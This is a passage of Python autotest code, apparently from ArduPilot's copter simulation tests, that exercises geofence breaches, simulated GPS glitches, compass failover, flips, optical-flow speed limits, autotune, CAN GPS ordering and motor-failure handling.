self.wait_heading(160, timeout=60)
self.set_rc(4, 1500)
fence_radius = self.get_parameter("FENCE_RADIUS")
self.progress("flying forward (east) until we hit fence")
pitching_forward = True
self.set_rc(2, 1100)
self.progress("Waiting for fence breach")
tstart = self.get_sim_time()
while not self.mode_is("RTL"):
if self.get_sim_time_cached() - tstart > 30:
raise NotAchievedException("Did not breach fence")
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
alt = m.relative_alt / 1000.0 # mm -> m
home_distance = self.distance_to_home(use_cached_home=True)
self.progress("Alt: %.02f HomeDistance: %.02f (fence radius=%f)" %
(alt, home_distance, fence_radius))
self.progress("Waiting until we get home and disarm")
tstart = self.get_sim_time()
while self.get_sim_time_cached() < tstart + timeout:
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
alt = m.relative_alt / 1000.0 # mm -> m
home_distance = self.distance_to_home(use_cached_home=True)
self.progress("Alt: %.02f HomeDistance: %.02f" %
(alt, home_distance))
# recenter pitch sticks once we're home so we don't fly off again
if pitching_forward and home_distance < 50:
pitching_forward = False
self.set_rc(2, 1475)
# disable fence
self.set_parameter("FENCE_ENABLE", 0)
if (alt <= 1 and home_distance < 10) or (not self.armed() and home_distance < 10):
# reduce throttle
self.zero_throttle()
self.change_mode("LAND")
self.wait_landed_and_disarmed()
self.progress("Reached home OK")
self.zero_throttle()
return
# give we're testing RTL, doing one here probably doesn't make sense
home_distance = self.distance_to_home(use_cached_home=True)
raise AutoTestTimeoutException(
"Fence test failed to reach home (%fm distance) - "
"timed out after %u seconds" % (home_distance, timeout,))
# fly_alt_max_fence_test - fly up until you hit the fence ceiling
def fly_alt_max_fence_test(self):
self.takeoff(10, mode="LOITER")
"""Hold loiter position."""
# enable fence, disable avoidance
self.set_parameter("FENCE_ENABLE", 1)
self.set_parameter("AVOID_ENABLE", 0)
self.set_parameter("FENCE_TYPE", 1)
self.change_alt(10)
# first east
self.progress("turning east")
self.set_rc(4, 1580)
self.wait_heading(160, timeout=60)
self.set_rc(4, 1500)
self.progress("flying east 20m")
self.set_rc(2, 1100)
self.wait_distance(20)
self.progress("flying up")
self.set_rc_from_map({
2: 1500,
3: 1800,
})
# wait for fence to trigger
self.wait_mode('RTL', timeout=120)
self.wait_rtl_complete()
self.zero_throttle()
# fly_alt_min_fence_test - fly down until you hit the fence floor
def fly_alt_min_fence_test(self):
self.takeoff(30, mode="LOITER", timeout=60)
# enable fence, disable avoidance
self.set_parameter("AVOID_ENABLE", 0)
self.set_parameter("FENCE_TYPE", 8)
self.set_parameter("FENCE_ALT_MIN", 20)
self.change_alt(30)
# Activate the floor fence
# TODO this test should run without requiring this
self.do_fence_enable()
# first east
self.progress("turn east")
self.set_rc(4, 1580)
self.wait_heading(160, timeout=60)
self.set_rc(4, 1500)
# fly forward (east) at least 20m
self.set_rc(2, 1100)
self.wait_distance(20)
# stop flying forward and start flying down:
self.set_rc_from_map({
2: 1500,
3: 1200,
})
# wait for fence to trigger
self.wait_mode('RTL', timeout=120)
self.wait_rtl_complete()
# Disable the fence using mavlink command to ensure cleaned up SITL state
self.do_fence_disable()
self.zero_throttle()
def fly_fence_floor_enabled_landing(self):
""" fly_fence_floor_enabled_landing. Ensures we can initiate and complete
an RTL while the fence is enabled. """
fence_bit = mavutil.mavlink.MAV_SYS_STATUS_GEOFENCE
self.progress("Test Landing while fence floor enabled")
self.set_parameter("AVOID_ENABLE", 0)
self.set_parameter("FENCE_TYPE", 15)
self.set_parameter("FENCE_ALT_MIN", 10)
self.set_parameter("FENCE_ALT_MAX", 20)
self.change_mode("GUIDED")
self.wait_ready_to_arm()
self.arm_vehicle()
self.user_takeoff(alt_min=15)
# Check fence is enabled
self.do_fence_enable()
self.assert_fence_enabled()
# Change to RC controlled mode
self.change_mode('LOITER')
self.set_rc(3, 1800)
self.wait_mode('RTL', timeout=120)
self.wait_landed_and_disarmed()
self.assert_fence_enabled()
# Assert fence is not healthy
self.assert_sensor_state(fence_bit, healthy=False)
# Disable the fence using mavlink command to ensure cleaned up SITL state
self.do_fence_disable()
self.assert_fence_disabled()
def fly_gps_glitch_loiter_test(self, timeout=30, max_distance=20):
"""fly_gps_glitch_loiter_test. Fly south east in loiter and test
reaction to gps glitch."""
self.takeoff(10, mode="LOITER")
# turn on simulator display of gps and actual position
if self.use_map:
self.show_gps_and_sim_positions(True)
# set-up gps glitch array
glitch_lat = [0.0002996,
0.0006958,
0.0009431,
0.0009991,
0.0009444,
0.0007716,
0.0006221]
glitch_lon = [0.0000717,
0.0000912,
0.0002761,
0.0002626,
0.0002807,
0.0002049,
0.0001304]
glitch_num = len(glitch_lat)
self.progress("GPS Glitches:")
for i in range(1, glitch_num):
self.progress("glitch %d %.7f %.7f" %
(i, glitch_lat[i], glitch_lon[i]))
# turn south east
self.progress("turn south east")
self.set_rc(4, 1580)
try:
self.wait_heading(150)
self.set_rc(4, 1500)
# fly forward (south east) at least 60m
self.set_rc(2, 1100)
self.wait_distance(60)
self.set_rc(2, 1500)
# wait for copter to slow down
except Exception as e:
if self.use_map:
self.show_gps_and_sim_positions(False)
raise e
# record time and position
tstart = self.get_sim_time()
tnow = tstart
start_pos = self.sim_location()
# initialise current glitch
glitch_current = 0
self.progress("Apply first glitch")
self.set_parameter("SIM_GPS_GLITCH_X", glitch_lat[glitch_current])
self.set_parameter("SIM_GPS_GLITCH_Y", glitch_lon[glitch_current])
# record position for 30 seconds
while tnow < tstart + timeout:
tnow = self.get_sim_time_cached()
desired_glitch_num = int((tnow - tstart) * 2.2)
if desired_glitch_num > glitch_current and glitch_current != -1:
glitch_current = desired_glitch_num
# turn off glitching if we've reached the end of glitch list
if glitch_current >= glitch_num:
glitch_current = -1
self.progress("Completed Glitches")
self.set_parameter("SIM_GPS_GLITCH_X", 0)
self.set_parameter("SIM_GPS_GLITCH_Y", 0)
else:
self.progress("Applying glitch %u" % glitch_current)
# move onto the next glitch
self.set_parameter("SIM_GPS_GLITCH_X", glitch_lat[glitch_current])
self.set_parameter("SIM_GPS_GLITCH_Y", glitch_lon[glitch_current])
# start displaying distance moved after all glitches applied
if glitch_current == -1:
m = self.mav.recv_match(type='GLOBAL_POSITION_INT',
blocking=True)
alt = m.alt/1000.0 # mm -> m
curr_pos = self.sim_location()
moved_distance = self.get_distance(curr_pos, start_pos)
self.progress("Alt: %.02f Moved: %.0f" %
(alt, moved_distance))
if moved_distance > max_distance:
raise NotAchievedException(
"Moved over %u meters, Failed!" % max_distance)
else:
self.drain_mav()
# disable gps glitch
if glitch_current != -1:
self.set_parameter("SIM_GPS_GLITCH_X", 0)
self.set_parameter("SIM_GPS_GLITCH_Y", 0)
if self.use_map:
self.show_gps_and_sim_positions(False)
self.progress("GPS glitch test passed!"
" stayed within %u meters for %u seconds" %
(max_distance, timeout))
self.do_RTL()
# re-arming is problematic because the GPS is glitching!
self.reboot_sitl()
# fly_gps_glitch_auto_test - fly mission and test reaction to gps glitch
def fly_gps_glitch_auto_test(self, timeout=180):
# set-up gps glitch array
glitch_lat = [0.0002996,
0.0006958,
0.0009431,
0.0009991,
0.0009444,
0.0007716,
0.0006221]
glitch_lon = [0.0000717,
0.0000912,
0.0002761,
0.0002626,
0.0002807,
0.0002049,
0.0001304]
glitch_num = len(glitch_lat)
self.progress("GPS Glitches:")
for i in range(1, glitch_num):
self.progress("glitch %d %.7f %.7f" %
(i, glitch_lat[i], glitch_lon[i]))
# Fly mission #1
self.progress("# Load copter_glitch_mission")
# load the waypoint count
num_wp = self.load_mission("copter_glitch_mission.txt", strict=False)
if not num_wp:
raise NotAchievedException("load copter_glitch_mission failed")
# turn on simulator display of gps and actual position
if self.use_map:
self.show_gps_and_sim_positions(True)
self.progress("test: Fly a mission from 1 to %u" % num_wp)
self.set_current_waypoint(1)
self.change_mode("STABILIZE")
self.wait_ready_to_arm()
self.zero_throttle()
self.arm_vehicle()
# switch into AUTO mode and raise throttle
self.change_mode('AUTO')
self.set_rc(3, 1500)
# wait until 100m from home
try:
self.wait_distance(100, 5, 90)
except Exception as e:
if self.use_map:
self.show_gps_and_sim_positions(False)
raise e
# record time and position
tstart = self.get_sim_time()
# initialise current glitch
glitch_current = 0
self.progress("Apply first glitch")
self.set_parameter("SIM_GPS_GLITCH_X", glitch_lat[glitch_current])
self.set_parameter("SIM_GPS_GLITCH_Y", glitch_lon[glitch_current])
# record position for 30 seconds
while glitch_current < glitch_num:
tnow = self.get_sim_time()
desired_glitch_num = int((tnow - tstart) * 2.2)
if desired_glitch_num > glitch_current and glitch_current != -1:
glitch_current = desired_glitch_num
# apply next glitch
if glitch_current < glitch_num:
self.progress("Applying glitch %u" % glitch_current)
self.set_parameter("SIM_GPS_GLITCH_X",
glitch_lat[glitch_current])
self.set_parameter("SIM_GPS_GLITCH_Y",
glitch_lon[glitch_current])
# turn off glitching
self.progress("Completed Glitches")
self.set_parameter("SIM_GPS_GLITCH_X", 0)
self.set_parameter("SIM_GPS_GLITCH_Y", 0)
# continue with the mission
self.wait_waypoint(0, num_wp-1, timeout=500)
# wait for arrival back home
self.wait_distance_to_home(0, 10, timeout=timeout)
# turn off simulator display of gps and actual position
if self.use_map:
self.show_gps_and_sim_positions(False)
self.progress("GPS Glitch test Auto completed: passed!")
self.wait_disarmed()
# re-arming is problematic because the GPS is glitching!
self.reboot_sitl()
# fly_simple - assumes the simple bearing is initialised to be
# directly north flies a box with 100m west, 15 seconds north,
# 50 seconds east, 15 seconds south
def fly_simple(self, side=50):
self.takeoff(10, mode="LOITER")
# set SIMPLE mode for all flight modes
self.set_parameter("SIMPLE", 63)
# switch to stabilize mode
self.change_mode('STABILIZE')
self.set_rc(3, 1545)
# fly south 50m
self.progress("# Flying south %u meters" % side)
self.set_rc(1, 1300)
self.wait_distance(side, 5, 60)
self.set_rc(1, 1500)
# fly west 8 seconds
self.progress("# Flying west for 8 seconds")
self.set_rc(2, 1300)
tstart = self.get_sim_time()
while self.get_sim_time_cached() < (tstart + 8):
self.mav.recv_match(type='VFR_HUD', blocking=True)
self.set_rc(2, 1500)
# fly north 25 meters
self.progress("# Flying north %u meters" % (side/2.0))
self.set_rc(1, 1700)
self.wait_distance(side/2, 5, 60)
self.set_rc(1, 1500)
# fly east 8 seconds
self.progress("# Flying east for 8 seconds")
self.set_rc(2, 1700)
tstart = self.get_sim_time()
while self.get_sim_time_cached() < (tstart + 8):
self.mav.recv_match(type='VFR_HUD', blocking=True)
self.set_rc(2, 1500)
# hover in place
self.hover()
self.do_RTL(timeout=500)
# fly_super_simple - flies a circle around home for 45 seconds
def fly_super_simple(self, timeout=45):
self.takeoff(10, mode="LOITER")
# fly forward 20m
self.progress("# Flying forward 20 meters")
self.set_rc(2, 1300)
self.wait_distance(20, 5, 60)
self.set_rc(2, 1500)
# set SUPER SIMPLE mode for all flight modes
self.set_parameter("SUPER_SIMPLE", 63)
# switch to stabilize mode
self.change_mode("ALT_HOLD")
self.set_rc(3, 1500)
# start copter yawing slowly
self.set_rc(4, 1550)
# roll left for timeout seconds
self.progress("# rolling left from pilot's POV for %u seconds"
% timeout)
self.set_rc(1, 1300)
tstart = self.get_sim_time()
while self.get_sim_time_cached() < (tstart + timeout):
self.mav.recv_match(type='VFR_HUD', blocking=True)
# stop rolling and yawing
self.set_rc(1, 1500)
self.set_rc(4, 1500)
# restore simple mode parameters to default
self.set_parameter("SUPER_SIMPLE", 0)
# hover in place
self.hover()
self.do_RTL()
# fly_circle - flies a circle with 20m radius
def fly_circle(self, holdtime=36):
# the following should not be required. But there appears to
# be a physics failure in the simulation which is causing CI
# to fall over a lot. -pb 202007021209
self.reboot_sitl()
self.takeoff(10, mode="LOITER")
# face west
self.progress("turn west")
self.set_rc(4, 1580)
self.wait_heading(270)
self.set_rc(4, 1500)
# set CIRCLE radius
self.set_parameter("CIRCLE_RADIUS", 3000)
# fly forward (east) at least 100m
self.set_rc(2, 1100)
self.wait_distance(100)
# return pitch stick back to middle
self.set_rc(2, 1500)
# set CIRCLE mode
self.change_mode('CIRCLE')
# wait
m = self.mav.recv_match(type='VFR_HUD', blocking=True)
start_altitude = m.alt
tstart = self.get_sim_time()
self.progress("Circle at %u meters for %u seconds" %
(start_altitude, holdtime))
while self.get_sim_time_cached() < tstart + holdtime:
m = self.mav.recv_match(type='VFR_HUD', blocking=True)
self.progress("heading %d" % m.heading)
self.progress("CIRCLE OK for %u seconds" % holdtime)
self.do_RTL()
# test_mag_fail - test failover of compass in EKF
def test_mag_fail(self):
# we want both EK2 and EK3
self.set_parameter("EK2_ENABLE", 1)
self.set_parameter("EK3_ENABLE", 1)
self.takeoff(10, mode="LOITER")
self.change_mode('CIRCLE')
self.delay_sim_time(20)
self.context_collect("STATUSTEXT")
self.progress("Failing first compass")
self.set_parameter("SIM_MAG1_FAIL", 1)
# we want for the message twice, one for EK2 and again for EK3
self.wait_statustext("EKF2 IMU0 switching to compass 1", check_context=True)
self.wait_statustext("EKF3 IMU0 switching to compass 1", check_context=True)
self.progress("compass switch 1 OK")
self.delay_sim_time(2)
self.context_clear_collection("STATUSTEXT")
self.progress("Failing 2nd compass")
self.set_parameter("SIM_MAG2_FAIL", 1)
self.wait_statustext("EKF2 IMU0 switching to compass 2", check_context=True)
self.wait_statustext("EKF3 IMU0 switching to compass 2", check_context=True)
self.progress("compass switch 2 OK")
self.delay_sim_time(2)
self.context_clear_collection("STATUSTEXT")
self.progress("Failing 3rd compass")
self.set_parameter("SIM_MAG3_FAIL", 1)
self.delay_sim_time(2)
self.set_parameter("SIM_MAG1_FAIL", 0)
self.wait_statustext("EKF2 IMU0 switching to compass 0", check_context=True)
self.wait_statustext("EKF3 IMU0 switching to compass 0", check_context=True)
self.progress("compass switch 0 OK")
self.do_RTL()
def wait_attitude(self, desroll=None, despitch=None, timeout=2, tolerance=10):
'''wait for an attitude (degrees)'''
if desroll is None and despitch is None:
raise ValueError("despitch or desroll must be supplied")
tstart = self.get_sim_time()
while True:
if self.get_sim_time_cached() - tstart > 2:
raise AutoTestTimeoutException("Failed to achieve attitude")
m = self.mav.recv_match(type='ATTITUDE', blocking=True)
roll_deg = math.degrees(m.roll)
pitch_deg = math.degrees(m.pitch)
self.progress("wait_att: roll=%f desroll=%s pitch=%f despitch=%s" %
(roll_deg, desroll, pitch_deg, despitch))
if desroll is not None and abs(roll_deg - desroll) > tolerance:
continue
if despitch is not None and abs(pitch_deg - despitch) > tolerance:
continue
return
def fly_flip(self):
ex = None
try:
self.set_message_rate_hz(mavutil.mavlink.MAVLINK_MSG_ID_ATTITUDE, 100)
self.takeoff(20)
self.hover()
old_speedup = self.get_parameter("SIM_SPEEDUP")
self.set_parameter('SIM_SPEEDUP', 1)
self.progress("Flipping in roll")
self.set_rc(1, 1700)
self.send_cmd_do_set_mode('FLIP') # don't wait for success
self.wait_attitude(despitch=0, desroll=45, tolerance=30)
self.wait_attitude(despitch=0, desroll=90, tolerance=30)
self.wait_attitude(despitch=0, desroll=-45, tolerance=30)
self.progress("Waiting for level")
self.set_rc(1, 1500) # can't change quickly enough!
self.wait_attitude(despitch=0, desroll=0, tolerance=5)
self.progress("Regaining altitude")
self.change_mode('ALT_HOLD')
self.wait_for_alt(20, max_err=40)
self.progress("Flipping in pitch")
self.set_rc(2, 1700)
self.send_cmd_do_set_mode('FLIP') # don't wait for success
self.wait_attitude(despitch=45, desroll=0, tolerance=30)
# can't check roll here as it flips from 0 to -180..
self.wait_attitude(despitch=90, tolerance=30)
self.wait_attitude(despitch=-45, tolerance=30)
self.progress("Waiting for level")
self.set_rc(2, 1500) # can't change quickly enough!
self.wait_attitude(despitch=0, desroll=0, tolerance=5)
self.set_parameter('SIM_SPEEDUP', old_speedup)
self.do_RTL()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.set_message_rate_hz(mavutil.mavlink.MAVLINK_MSG_ID_ATTITUDE, 0)
if ex is not None:
raise ex
# fly_optical_flow_limits - test EKF navigation limiting
def fly_optical_flow_limits(self):
ex = None
self.context_push()
try:
self.set_parameter("SIM_FLOW_ENABLE", 1)
self.set_parameter("FLOW_TYPE", 10)
# configure EKF to use optical flow instead of GPS
ahrs_ekf_type = self.get_parameter("AHRS_EKF_TYPE")
if ahrs_ekf_type == 2:
self.set_parameter("EK2_GPS_TYPE", 3)
if ahrs_ekf_type == 3:
self.set_parameter("EK3_SRC1_POSXY", 0)
self.set_parameter("EK3_SRC1_VELXY", 5)
self.set_parameter("EK3_SRC1_VELZ", 0)
self.set_analog_rangefinder_parameters()
self.set_parameter("SIM_GPS_DISABLE", 1)
self.set_parameter("SIM_TERRAIN", 0)
self.reboot_sitl()
# we can't takeoff in loiter as we need flow healthy
self.takeoff(alt_min=5, mode='ALT_HOLD', require_absolute=False, takeoff_throttle=1800)
self.change_mode('LOITER')
# speed should be limited to <10m/s
self.set_rc(2, 1000)
tstart = self.get_sim_time()
timeout = 60
started_climb = False
while self.get_sim_time_cached() - tstart < timeout:
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
spd = math.sqrt(m.vx**2 + m.vy**2) * 0.01
alt = m.relative_alt*0.001
# calculate max speed from altitude above the ground
margin = 2.0
max_speed = alt * 1.5 + margin
self.progress("%0.1f: Low Speed: %f (want <= %u) alt=%.1f" %
(self.get_sim_time_cached() - tstart,
spd,
max_speed, alt))
if spd > max_speed:
raise NotAchievedException(("Speed should be limited by"
"EKF optical flow limits"))
# after 30 seconds start climbing
if not started_climb and self.get_sim_time_cached() - tstart > 30:
started_climb = True
self.set_rc(3, 1900)
self.progress("Moving higher")
# check altitude is not climbing above 35m
if alt > 35:
raise NotAchievedException("Alt should be limited by EKF optical flow limits")
except Exception as e:
self.print_exception_caught(e)
ex = e
self.set_rc(2, 1500)
self.context_pop()
self.disarm_vehicle(force=True)
self.reboot_sitl()
if ex is not None:
raise ex
def fly_autotune(self):
"""Test autotune mode"""
rlld = self.get_parameter("ATC_RAT_RLL_D")
rlli = self.get_parameter("ATC_RAT_RLL_I")
rllp = self.get_parameter("ATC_RAT_RLL_P")
self.takeoff(10)
# hold position in loiter
self.change_mode('AUTOTUNE')
tstart = self.get_sim_time()
sim_time_expected = 5000
deadline = tstart + sim_time_expected
while self.get_sim_time_cached() < deadline:
now = self.get_sim_time_cached()
m = self.mav.recv_match(type='STATUSTEXT',
blocking=True,
timeout=1)
if m is None:
continue
self.progress("STATUSTEXT (%u<%u): %s" % (now, deadline, m.text))
if "AutoTune: Success" in m.text:
self.progress("AUTOTUNE OK (%u seconds)" % (now - tstart))
# near enough for now:
self.change_mode('LAND')
self.wait_landed_and_disarmed()
# check the original gains have been re-instated
if (rlld != self.get_parameter("ATC_RAT_RLL_D") or
rlli != self.get_parameter("ATC_RAT_RLL_I") or
rllp != self.get_parameter("ATC_RAT_RLL_P")):
raise NotAchievedException("AUTOTUNE gains still present")
return
raise NotAchievedException("AUTOTUNE failed (%u seconds)" %
(self.get_sim_time() - tstart))
def fly_autotune_switch(self):
"""Test autotune on a switch with gains being saved"""
# autotune changes a set of parameters on the vehicle which
# are not in our context. That changes the flight
# characterstics, which we can't afford between runs. So
# completely reset the simulated vehicle after the run is
# complete by "customising" the commandline here:
self.customise_SITL_commandline([])
self.context_push()
ex = None
try:
self.fly_autotune_switch_body()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
if ex is not None:
raise ex
def fly_autotune_switch_body(self):
self.set_parameter("RC8_OPTION", 17)
self.set_parameter("ATC_RAT_RLL_FLTT", 20)
rlld = self.get_parameter("ATC_RAT_RLL_D")
rlli = self.get_parameter("ATC_RAT_RLL_I")
rllp = self.get_parameter("ATC_RAT_RLL_P")
rllt = self.get_parameter("ATC_RAT_RLL_FLTT")
self.progress("AUTOTUNE pre-gains are P:%f I:%f D:%f" %
(self.get_parameter("ATC_RAT_RLL_P"),
self.get_parameter("ATC_RAT_RLL_I"),
self.get_parameter("ATC_RAT_RLL_D")))
self.takeoff(10, mode='LOITER')
# hold position in loiter and run autotune
self.set_rc(8, 1850)
self.wait_mode('AUTOTUNE')
tstart = self.get_sim_time()
sim_time_expected = 5000
deadline = tstart + sim_time_expected
while self.get_sim_time_cached() < deadline:
now = self.get_sim_time_cached()
m = self.mav.recv_match(type='STATUSTEXT',
blocking=True,
timeout=1)
if m is None:
continue
self.progress("STATUSTEXT (%u<%u): %s" % (now, deadline, m.text))
if "AutoTune: Success" in m.text:
self.progress("AUTOTUNE OK (%u seconds)" % (now - tstart))
# Check original gains are re-instated
self.set_rc(8, 1100)
self.delay_sim_time(1)
self.progress("AUTOTUNE original gains are P:%f I:%f D:%f" %
(self.get_parameter("ATC_RAT_RLL_P"), self.get_parameter("ATC_RAT_RLL_I"),
self.get_parameter("ATC_RAT_RLL_D")))
if (rlld != self.get_parameter("ATC_RAT_RLL_D") or
rlli != self.get_parameter("ATC_RAT_RLL_I") or
rllp != self.get_parameter("ATC_RAT_RLL_P")):
raise NotAchievedException("AUTOTUNE gains still present")
# Use autotuned gains
self.set_rc(8, 1850)
self.delay_sim_time(1)
self.progress("AUTOTUNE testing gains are P:%f I:%f D:%f" %
(self.get_parameter("ATC_RAT_RLL_P"), self.get_parameter("ATC_RAT_RLL_I"),
self.get_parameter("ATC_RAT_RLL_D")))
if (rlld == self.get_parameter("ATC_RAT_RLL_D") or
rlli == self.get_parameter("ATC_RAT_RLL_I") or
rllp == self.get_parameter("ATC_RAT_RLL_P")):
raise NotAchievedException("AUTOTUNE gains not present in pilot testing")
# land without changing mode
self.set_rc(3, 1000)
self.wait_for_alt(0)
self.wait_disarmed()
# Check gains are still there after disarm
if (rlld == self.get_parameter("ATC_RAT_RLL_D") or
rlli == self.get_parameter("ATC_RAT_RLL_I") or
rllp == self.get_parameter("ATC_RAT_RLL_P")):
raise NotAchievedException("AUTOTUNE gains not present on disarm")
self.reboot_sitl()
# Check gains are still there after reboot
if (rlld == self.get_parameter("ATC_RAT_RLL_D") or
rlli == self.get_parameter("ATC_RAT_RLL_I") or
rllp == self.get_parameter("ATC_RAT_RLL_P")):
raise NotAchievedException("AUTOTUNE gains not present on reboot")
# Check FLTT is unchanged
if rllt != self.get_parameter("ATC_RAT_RLL_FLTT"):
raise NotAchievedException("AUTOTUNE FLTT was modified")
return
raise NotAchievedException("AUTOTUNE failed (%u seconds)" %
(self.get_sim_time() - tstart))
# fly_auto_test - fly mission which tests a significant number of commands
def fly_auto_test(self):
# Fly mission #1
self.progress("# Load copter_mission")
# load the waypoint count
num_wp = self.load_mission("copter_mission.txt", strict=False)
if not num_wp:
raise NotAchievedException("load copter_mission failed")
self.progress("test: Fly a mission from 1 to %u" % num_wp)
self.set_current_waypoint(1)
self.change_mode("LOITER")
self.wait_ready_to_arm()
self.arm_vehicle()
# switch into AUTO mode and raise throttle
self.change_mode("AUTO")
self.set_rc(3, 1500)
# fly the mission
self.wait_waypoint(0, num_wp-1, timeout=500)
# set throttle to minimum
self.zero_throttle()
# wait for disarm
self.wait_disarmed()
self.progress("MOTORS DISARMED OK")
self.progress("Auto mission completed: passed!")
# fly_auto_test using CAN GPS - fly mission which tests normal operation alongside CAN GPS
def fly_auto_test_using_can_gps(self):
self.set_parameter("CAN_P1_DRIVER", 1)
self.set_parameter("GPS_TYPE", 9)
self.set_parameter("GPS_TYPE2", 9)
self.set_parameter("SIM_GPS2_DISABLE", 0)
self.context_push()
self.set_parameter("ARMING_CHECK", 1 << 3)
self.context_collect('STATUSTEXT')
self.reboot_sitl()
# Test UAVCAN GPS ordering working
gps1_det_text = self.wait_text("GPS 1: specified as UAVCAN.*", regex=True, check_context=True)
gps2_det_text = self.wait_text("GPS 2: specified as UAVCAN.*", regex=True, check_context=True)
gps1_nodeid = int(gps1_det_text.split('-')[1])
gps2_nodeid = int(gps2_det_text.split('-')[1])
if gps1_nodeid is None or gps2_nodeid is None:
raise NotAchievedException("GPS not ordered per the order of Node IDs")
self.context_stop_collecting('STATUSTEXT')
GPS_Order_Tests = [[gps2_nodeid, gps2_nodeid, gps2_nodeid, 0,
"PreArm: Same Node Id {} set for multiple GPS".format(gps2_nodeid)],
[gps1_nodeid, int(gps2_nodeid/2), gps1_nodeid, 0,
"Selected GPS Node {} not set as instance {}".format(int(gps2_nodeid/2), 2)],
[int(gps1_nodeid/2), gps2_nodeid, 0, gps2_nodeid,
"Selected GPS Node {} not set as instance {}".format(int(gps1_nodeid/2), 1)],
[gps1_nodeid, gps2_nodeid, gps1_nodeid, gps2_nodeid, ""],
[gps2_nodeid, gps1_nodeid, gps2_nodeid, gps1_nodeid, ""],
[gps1_nodeid, 0, gps1_nodeid, gps2_nodeid, ""],
[0, gps2_nodeid, gps1_nodeid, gps2_nodeid, ""]]
for case in GPS_Order_Tests:
self.progress("############################### Trying Case: " + str(case))
self.set_parameter("GPS1_CAN_OVRIDE", case[0])
self.set_parameter("GPS2_CAN_OVRIDE", case[1])
self.drain_mav()
self.context_collect('STATUSTEXT')
self.reboot_sitl()
gps1_det_text = None
gps2_det_text = None
try:
gps1_det_text = self.wait_text("GPS 1: specified as UAVCAN.*", regex=True, check_context=True)
except AutoTestTimeoutException:
pass
try:
gps2_det_text = self.wait_text("GPS 2: specified as UAVCAN.*", regex=True, check_context=True)
except AutoTestTimeoutException:
pass
self.context_stop_collecting('STATUSTEXT')
self.change_mode('LOITER')
if case[2] == 0 and case[3] == 0:
if gps1_det_text or gps2_det_text:
raise NotAchievedException("Failed ordering for requested CASE:", case)
if case[2] == 0 or case[3] == 0:
if bool(gps1_det_text is not None) == bool(gps2_det_text is not None):
print(gps1_det_text)
print(gps2_det_text)
raise NotAchievedException("Failed ordering for requested CASE:", case)
if gps1_det_text:
if case[2] != int(gps1_det_text.split('-')[1]):
raise NotAchievedException("Failed ordering for requested CASE:", case)
if gps2_det_text:
if case[3] != int(gps2_det_text.split('-')[1]):
raise NotAchievedException("Failed ordering for requested CASE:", case)
if len(case[4]):
self.context_collect('STATUSTEXT')
self.run_cmd(mavutil.mavlink.MAV_CMD_COMPONENT_ARM_DISARM,
1, # ARM
0,
0,
0,
0,
0,
0,
timeout=10,
want_result=mavutil.mavlink.MAV_RESULT_FAILED)
self.wait_statustext(case[4], check_context=True)
self.context_stop_collecting('STATUSTEXT')
self.progress("############################### All GPS Order Cases Tests Passed")
self.context_pop()
self.fly_auto_test()
def fly_motor_fail(self, fail_servo=0, fail_mul=0.0, holdtime=30):
"""Test flight with reduced motor efficiency"""
# we only expect an octocopter to survive ATM:
servo_counts = {
# 2: 6, # hexa
3: 8, # octa
# 5: 6, # Y6
}
frame_class = int(self.get_parameter("FRAME_CLASS"))
if frame_class not in servo_counts:
self.progress("Test not relevant for frame_class %u" % frame_class)
return
servo_count = servo_counts[frame_class]
if fail_servo < 0 or fail_servo > servo_count:
raise ValueError('fail_servo outside range for frame class')
self.takeoff(10, mode="LOITER")
self.change_alt(alt_min=50)
# Get initial values
start_hud = self.mav.recv_match(type='VFR_HUD', blocking=True)
start_attitude = self.mav.recv_match(type='ATTITUDE', blocking=True)
hover_time = 5
try:
tstart = self.get_sim_time()
int_error_alt = 0
int_error_yaw_rate = 0
int_error_yaw = 0
self.progress("Hovering for %u seconds" % hover_time)
failed = False
while True:
now = self.get_sim_time_cached()
if now - tstart > holdtime + hover_time:
break
servo = self.mav.recv_match(type='SERVO_OUTPUT_RAW',
blocking=True)
hud = self.mav.recv_match(type='VFR_HUD', blocking=True)
attitude = self.mav.recv_match(type='ATTITUDE', blocking=True)
if not failed and now - tstart > hover_time:
self.progress("Killing motor %u (%u%%)" %
(fail_servo+1, fail_mul))
self.set_parameter("SIM_ENGINE_FAIL", fail_servo)
self.set_parameter("SIM_ENGINE_MUL", fail_mul)
failed = True
if failed:
self.progress("Hold Time: %f/%f" % (now-tstart, holdtime))
servo_pwm = [servo.servo1_raw,
servo.servo2_raw,
servo.servo3_raw,
servo.servo4_raw,
servo.servo5_raw,
servo.servo6_raw,
servo.servo7_raw,
servo.servo8_raw]
self.progress("PWM output per motor")
for i, pwm in enumerate(servo_pwm[0:servo_count]):
if pwm > 1900:
state = "oversaturated"
elif pwm < 1200:
state = "undersaturated"
else:
state = "OK"
if failed and i == fail_servo:
state += " (failed)"
self.progress("servo %u [pwm=%u] [%s]" % (i+1, pwm, state))
alt_delta = hud.alt - start_hud.alt
yawrate_delta = attitude.yawspeed - start_attitude.yawspeed
yaw_delta = attitude.yaw - start_attitude.yaw
self.progress("Alt=%fm (delta=%fm)" % (hud.alt, alt_delta))
self.progress("Yaw rate=%f (delta=%f) (rad/s)" %
(attitude.yawspeed, yawrate_delta))
self.progress("Yaw=%f (delta=%f) (deg)" %
(attitude.yaw, yaw_delta))
dt = self.get_sim_time() - now
int_error_alt += abs(alt_delta/dt)
int_error_yaw_rate += abs(yawrate_delta/dt)
int_error_yaw += abs(yaw_delta/dt)
self.progress("## Error Integration ##")
self.progress(" Altitude: %fm" % int_error_alt)
self.progress(" Yaw rate: %f rad/s" % int_error_yaw_rate)
self.progress(" Yaw: %f deg" % int_error_yaw)
self.progress("----")
if int_error_yaw_rate > 0.1:
raise NotAchievedException("Vehicle is spinning")
if alt_delta < -20:
raise NotAchievedException("Vehicle is descending")
self.set_parameter("SIM_ENGINE_FAIL", 0)
self.set_parameter("SIM_ENGINE_MUL", 1.0)
except Exception as e:
self.set_parameter("SIM_ENGINE_FAIL", 0)
self.set_parameter("SIM_ENGINE_MUL", 1.0)
raise e
self.do_RTL()
def fly_motor_vibration(self):
"""Test flight with motor vibration"""
self.context_push()
ex = None
try:
self.set_rc_default()
# magic tridge EKF type that dramatically speeds up the test
self.set_parameters({
"AHRS_EKF_TYPE": 10,
"INS_LOG_BAT_MASK": 3,
"INS_LOG_BAT_OPT": 0,
"LOG_BITMASK": 958,
"LOG_DISARMED": 0,
